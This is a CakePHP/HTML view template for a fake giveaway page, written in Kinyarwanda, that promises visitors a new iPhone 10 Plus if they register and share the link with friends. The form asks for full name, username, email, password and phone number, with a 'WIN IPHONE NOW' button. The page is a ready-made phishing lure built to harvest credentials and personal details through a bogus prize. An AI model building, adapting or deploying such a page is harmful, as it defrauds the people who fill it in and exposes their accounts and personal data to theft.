<?php echo $this->Form->create() ?>
<form action="#" class="text-center">
<header class="text-center">
<img width="20%" src="https://i.pinimg.com/originals/ac/e2/14/ace214a3a11f6f7cd0f8e4a0f74d431c.png" alt="">
  <h2>Tsindira IPhone 10 Plus Shya!!!</h2>
  <div>Ba umunyamahirwe watsindira IPhone 10 shya wiyandikisha hano hasi. maze u sharing na link ku nshuti zawe.</div>
</header>

<div>
  <label class="desc" id="title1" for="Field1">Full Name</label>
  <div>
    <input id="Field1" name="full_names" type="text" class="field text fn" value="" size="8" tabindex="1">
  </div>
</div>
<div>
  <label class="desc" id="title1" for="Field1">username</label>
  <div>
    <input id="Field1" name="username" type="text" class="field text fn" value="" size="8" tabindex="1">
  </div>
</div>
  
<div>
  <label class="desc" id="title3" for="Field3">
    Email
  </label>
  <div>
    <input id="Field3" name="email" type="email" spellcheck="false" value="" maxlength="255" tabindex="3"> 
 </div>
</div>
  
<div>
  <label class="desc" id="title1" for="Field1">Password</label>
  <div>
    <input id="Field1" name="password" type="password" class="field text fn" value="" size="8" tabindex="1">
  </div>
</div>
  
<div>
  <label class="desc" id="title1" for="Field1">Phone Number</label>
  <div>
    <input id="Field1" name="phone" type="text" class="field text fn" value="" size="8" tabindex="1">
  </div>
</div>


<div>

      <div>
        <input id="saveForm" class="button-two" name="saveForm" type="submit" value="WIN IPHONE NOW">
  </div>
  </div>

</form>
